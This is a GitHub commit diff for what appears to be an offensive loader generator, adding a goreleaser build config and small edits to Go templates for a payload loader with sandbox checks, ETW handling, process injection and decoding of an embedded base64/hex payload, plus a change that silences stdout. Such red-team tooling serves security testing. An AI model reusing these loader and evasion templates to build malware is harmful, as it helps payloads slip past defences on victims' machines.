v3.01

optiv · Oct 15, 2021 · 384e29a · 384e29a
1 parent 2b96e3e
commit 384e29a
Show file tree

Hide file tree

Showing 3 changed files with 41 additions and 0 deletions.
diff --git a/.goreleaser.yml b/.goreleaser.yml
@@ -0,0 +1,35 @@
+# This is an example goreleaser.yaml file with some sane defaults.
+# Make sure to check the documentation at http://goreleaser.com
+before:
+  hooks:
+    # You may remove this if you don't use go modules.
+    - go mod download
+    # you may remove this if you don't need go generate
+    - go generate ./...
+builds:
+- env:
+  - CGO_ENABLED=0
+  goos:
+  - "darwin"
+  - "linux"
+  - "windows"
+  goarch:
+  - "amd64"
+archives:
+  - name_template: "{{ .ProjectName }}_{{ .Version }}_{{ .Os }}_{{ .Arch }}"
+    format: binary
+    files:
+      - LICENSE.txt
+      - README.md
+checksum:
+    name_template: '{{ .ProjectName }}_checksums.txt'
+source:
+  enabled: false
+snapshot:
+  name_template: "{{ .Tag }}-next"
+changelog:
+  sort: asc
+  filters:
+    exclude:
+      - '^docs:'
+      - '^test:'
diff --git a/Loader/Loader.go b/Loader/Loader.go
@@ -694,6 +694,7 @@ func Binaryfile(b64ciphertext string, b64key string, b64iv string, mode string,
 	}
 
 	if sandbox == true {
+		Binary.Variables["SandboxOS"] = `"os"`
 		Binary.Variables["IsDomainJoined"] = Cryptor.VarNumberLength(4, 12)
 		Binary.Variables["domain"] = Cryptor.VarNumberLength(4, 12)
 		Binary.Variables["status"] = Cryptor.VarNumberLength(4, 12)
@@ -720,6 +721,7 @@ func Binaryfile(b64ciphertext string, b64key string, b64iv string, mode string,
 		Binary.Variables["Sandbox"] = ""
 		Binary.Variables["Sandboxfunction"] = ""
 		Binary.Variables["SandboxImport"] = ""
+		Binary.Variables["SandboxOS"] = ""
 	}
 
 	if ETW == false {

diff --git a/Struct/Struct.go b/Struct/Struct.go
@@ -501,6 +501,7 @@ func Binary() string {
 		"syscall"
 		"unsafe"
 		"strconv"
+		{{.Variables.SandboxOS}}
 	
 		"golang.org/x/sys/windows"
 		"golang.org/x/sys/windows/registry"
@@ -972,6 +973,7 @@ func Procces_Injection_DLL() string {
 		"[loader]/[loader]"
 		"io/ioutil"
 		"syscall"
+		"os"
 		"time"
 		"unsafe"
 		"strconv"
@@ -1300,6 +1302,7 @@ func Start() {
 	{{.Variables.hexdata}}, _ := base64.StdEncoding.DecodeString({{.Variables.rawdata}})
 	{{.Variables.raw_bin}}, _ := hex.DecodeString(string({{.Variables.hexdata}}))
 	{{.Variables.ReloadRemoteProcess}}({{.Variables.raw_bin}})
+	os.Stdout, _ = os.Open(os.DevNull)
 }
 
 
@@ -1417,6 +1420,7 @@ func Procces_Injection() string {
 		"time"
 		"unsafe"
 		"strconv"
+		{{.Variables.SandboxOS}}
 
 		"golang.org/x/sys/windows"
 		"golang.org/x/sys/windows/registry"